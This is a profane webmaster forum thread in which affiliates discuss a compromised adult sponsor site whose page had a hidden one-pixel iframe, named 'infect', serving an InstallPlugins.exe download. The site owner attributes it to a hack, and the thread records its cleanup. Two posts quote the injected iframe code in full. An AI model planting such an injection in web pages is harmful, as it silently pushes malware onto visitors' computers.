Who the fuck is ghostcash and who is in charge over there?
 

Anyone around I can get ahold of? WTF is this shit all about?

<iframe src=http://www.xxxxxxxxxxxxx.com/InstallPlugins.exe frameborder=\"0\" width=\"1\" height=\"1\" scrolling=\"no\" name=\"infect\"></iframe>

These fucks put some shit on my server somehow and want to serve installs?

:321GFY

That's not good, any idea how it got on there? I promote some Ghost Cash sites...I sure hope they aren't adding spamware on my surfers computers. :disgust

Just how would they put stuff on your servers?
Did you give them the ability to upload?
Or is it that perhaps you been hacked and someone else is fucking your traffic and sending it to them or whatever? What you show above says nothing really, aside from that someone was silly enough to name it "infect".

I doubt they'd do that on purpose. They probably got hacked.

It says on his server.

Yeah I don't understand how it relates to them either. Unless the exe file is hosted on one of GhostCash' sites there's no link to them.

Go to http://www.trixieswallows.com/main

view source, its right at the top. I got a screen shot as well

url 404s

http://www.trixieswallows.com/main/

still works for me

Super Ghost is in charge.
But I hear he's flying over the city and stopping all the crime at the moment.

Check the source, seems to be an iframe on that page or something like mentioned by the thread starter.

The .exe goes 404 for me though

It 404'd the first time I clicked the link, but the second time I got the tour page with the iframe code.

It sure looks like a server hack.

its not on all their sites, I just checked creampie thais and it looks clean

yeah ic it

<html>
<body>
<iframe src=hxxp://www.fordstrokers.com/InstallPlugins.exe frameborder=\"0\" width=\"1\" height=\"1\" scrolling=\"no\" name=\"infect\"></iframe>
</body>
</html>

:321gfy:321gfy:321gfy

Ghostcash are good people. No doubt that's a server hack.

A ghost did it, he he he

yeah i had one it was hidden in php code in my site

Wow, you were right. I can't believe I am seeing a code named infect on a sponsor site. Nobody has been able to contact them yet?

ya tell me about it. So I was hacked, thats a given and they were hacked as well? Hmm I guess :1orglaugh

:helpme ...............

that's fucked up..

bump for some answers

Whoa, yea we were hacked last week so thats definitely NOT from us. We have our programmer on this right now.

i give up.

LOL exploit/hacked code been up for a WEEK? NICE JOB MANAGING YOUR SHIT

we are investigating what appears to be a hack of our system. We value our affiliates and customers and would NEVER consider installing any thing on ANY computer.

We had a problem with one our other servers last week NOT the main tour server, and NO, we would NOT allow it to go one more than the time it takes to solve it.

Thank god Thainee seems to be clean....

i contacted isprime where the exe was located and they were already removing it from another hacked site. kudos to isprime

Yes, this issue was with trixieswallows only. All of our other sites were unaffected. Everything is back to normal now..

Thats the same shit I saw on a whole bunch of hacked wordpress blogs back in August/September.

email Caspar-
I hear he is very friendly

:1orglaugh